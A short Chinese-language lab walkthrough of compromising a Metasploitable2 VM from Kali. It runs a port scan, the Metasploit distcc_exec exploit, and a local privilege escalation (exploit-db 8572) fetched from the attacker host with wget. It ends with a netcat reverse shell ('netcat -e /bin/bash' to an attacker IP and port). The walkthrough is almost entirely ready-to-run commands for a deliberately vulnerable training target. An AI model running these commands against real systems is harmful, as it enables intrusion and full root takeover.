环境:
kali:192.168.43.131
metasploitables2:192.168.43.132
利用的是meta2上的distccd服务的漏洞,以下将metaspolitables2简称为tb2
步骤:
1、先用nmap扫一下td2的端口(服务):
nmap -p- 192.168.43.132
2、发现distccd服务,打开msf,搜一下有没有该服务的漏洞利用程序:
msfconsole
search distccd
3、发现有一个:exploit/unix/misc/distcc_exec
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.43.132
exploit
4、发现成功进入tb2,看下权限,发现是daemon权限:
whoami
...
5、提权
下载提升权限的exploit:www.exploit-db.com/exploits/8572
下载后将文件放到/var/www/html文件下,开启apache2服务:service apache2 start
先使用之前用msf得到的那个daemon权限的shell,来下载我们的提权exploit:
wget “http://192.168.43.131/8572.c”
然后编译一下:gcc 8572.c -o 8572
看一下exploit需要的参数,发现需要udevd netlink socket的PID,查一下:
ps aux|grep udev
注意这里得到的PID与我们需要的PID大1,需要减一个1
然后运行该程序,我们就获得了root权限
接下来,我们用tb2上的netcat程序给我们弹回一个shell回来(因为这里的提权exploit会把文件名为run的可执行文件当作其payload,所以我们构造一个run):
echo '#!/bin/bash' > run
echo '/bin/netcat -e /bin/bash 192.168.43.133 31333' >> run
然后在kali上开启监听:
nc -vv -l -p 31333
在tb2上再次运行一下:./8572 PID值
会发现kali上的nc得到了结果
